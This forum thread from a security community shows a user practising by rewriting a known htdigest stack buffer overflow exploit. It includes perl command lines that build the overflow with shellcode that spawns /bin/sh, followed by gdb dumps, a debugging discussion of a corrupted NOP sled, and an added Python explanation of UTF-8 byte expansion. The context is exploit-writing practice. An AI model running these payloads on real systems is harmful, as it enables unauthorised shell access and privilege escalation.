First exploit coding stack corruption - HeapOverflow Computer Security Community & Forums



h3llfyr3
22-10-05, 14:04
Hi All,
my stack's going a bit weird. I'm re-writing the htdigest exploit (http://seclists.org/lists/bugtraq/2005/May/0154.html)
as a practice. Anyway I do this

[root@localhost bin]# ./htdigest ./hohi `perl -e 'print "\x41"x286 .
"\xe9\xfb\xff\xbf" . "\x90"x30 .
"\x31\xdb\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"'` user

I get the following stack output

ecx 0x8050d28 134548776
edx 0x22d9 8921
ebx 0x41414141 1094795585
esp 0xbfffee50 0xbfffee50
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x41414141 0x41414141
eflags 0x10286 66182
cs 0x23 35
ss 0x2b 43
ds 0xc010002b -1072693205
es 0x2b 43

Before, on exactly the same buffer but without shellcode, I had control of EIP, but when I added the shellcode I suddenly end up having EIP full of AAAA's. Perhaps I jumped to the wrong address, but in the address I jumped to I have a nopsled and all these 0xc2's, which I don't think should be there.
Any ideas?

(gdb) x/bx 0xbffffbe9
0xbffffbe9: 0xc2
(gdb)
0xbffffbea: 0x90
(gdb)
0xbffffbeb: 0xc2
(gdb)
0xbffffbec: 0x90
(gdb)
0xbffffbed: 0xc2

h3llfyr3
22-10-05, 15:08
Dropped the \x41 for a nopsled to fill the buffer, but the nopsled seems to corrupt, or at least it isn't a nopsled anymore.
But I know my problem, and now I'm hitting the nopsled. I am with the program now and know what we are looking for in the structure.
But the nopsled is corrupt, or at least it isn't a nopsled anymore.

maximumbuffer(NOP's) - strlen(shellcode) - 4,
structure
[nopsssssssssssss][shellcode][retaddr]

[root@localhost bin]# ./htdigest ./hohi `perl -e 'print "\x90"x269 .
"\x31\xc0\xb0\x46\x31\xc9\xcd\x80\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58\x41\x41\x41\x42\x42\x42\x42" .
"\xc0\xfb\xff\xbf\x45"'` user

new info reg

ebx 0x90c290c2 -1866297150
esp 0xbfffdbf0 0xbfffdbf0
ebp 0x90c290c2 0x90c290c2
esi 0x90c290c2 -1866297150
edi 0x90c290c2 -1866297150
eip 0x90c290c2 0x90c290c2

This is no nopsled, but we are in the right place, I think.
(gdb) x/bx 0xbffffbc0
0xbffffbc0: 0xc2
(gdb)
0xbffffbc1: 0x90
(gdb)
0xbffffbc2: 0xc2
(gdb)
0xbffffbc3: 0x90
(gdb)
0xbffffbc4: 0xc2
I tried again to find it using objdump but no luck
[root@localhost bin]# objdump -s core.1888 | grep "90909090"

Where's my nopsled??

h3llfyr3
22-10-05, 17:40
Wish I could edit my posts rather than keep posting ;)
But AFAIK it's not a non-executable stack either.

h3llfyr3
24-10-05, 10:01
EDIT
Definitely very weird.

I don't really know what the problem is. What I do know is that when you use \x90 it's putting 2 bytes on the stack. At the moment, when you use \x90 instead of \x41, you have to have twice as many \x41 as when you use \x90.

htdigest ./pikah `perl -e 'print "\x90"x163'` user
Adding user ������������������������������������ in realm
����������������������������������������������������������������������������
����������������������������������������������������������������������������
������������
New password:
Re-type new password:
Segmentation fault (core dumped)

htdigest ./pikah `perl -e 'print "\x41"x163'` user
Adding user user in realm
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAA
New password:
Re-type new password:
(no core dump)
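An added example (my code, not the poster's) showing one encoding-layer reading that is consistent with the bytes in the dumps above: if some layer between perl's output and the crashing program treats the data as Latin-1 text and re-encodes it as UTF-8, a 0x90 byte becomes the two bytes c2 90 while 0x41 stays one byte, which would also account for the 163-byte lines behaving so differently. That such a layer is present here is my assumption; the helpers check whether a dumped region is that kind of expansion and recover the original bytes if so.

```python
from typing import Optional


def utf8_expand(raw: bytes) -> bytes:
    """Re-encode bytes that a text layer read as Latin-1 into UTF-8.
    Bytes below 0x80 pass through unchanged; bytes 0x80..0xff each
    become a two-byte sequence (c2 xx or c3 xx), so 0x90 -> c2 90."""
    return raw.decode("latin-1").encode("utf-8")


def expanded_length(raw: bytes) -> int:
    """Length the data would have after that expansion, without building it."""
    return sum(2 if b >= 0x80 else 1 for b in raw)


def recover_original(dump: bytes) -> Optional[bytes]:
    """If `dump` is the UTF-8 expansion of a Latin-1 byte string, return the
    original bytes; otherwise return None (invalid or truncated UTF-8, or
    code points above U+00FF that no single Latin-1 byte could have produced)."""
    try:
        text = dump.decode("utf-8")
    except UnicodeDecodeError:
        return None
    try:
        return text.encode("latin-1")
    except UnicodeEncodeError:
        return None


def looks_like_expanded_nops(dump: bytes) -> bool:
    """True when a memory region is what a run of 0x90 bytes turns into
    after the expansion (the c2 90 c2 90 ... pattern read with x/bx above)."""
    original = recover_original(dump)
    return original is not None and set(original) == {0x90}


if __name__ == "__main__":
    # Constructed sample dump: eight bytes of the pattern seen at 0xbffffbc0
    # (the thread shows five; a whole number of pairs is needed to decode).
    dump = bytes([0xc2, 0x90] * 4)
    print(looks_like_expanded_nops(dump))        # True
    print(recover_original(dump).hex())          # 90909090
    # The two 163-byte command lines from the last post end up different sizes
    print(expanded_length(b"\x90" * 163), expanded_length(b"\x41" * 163))  # 326 163
```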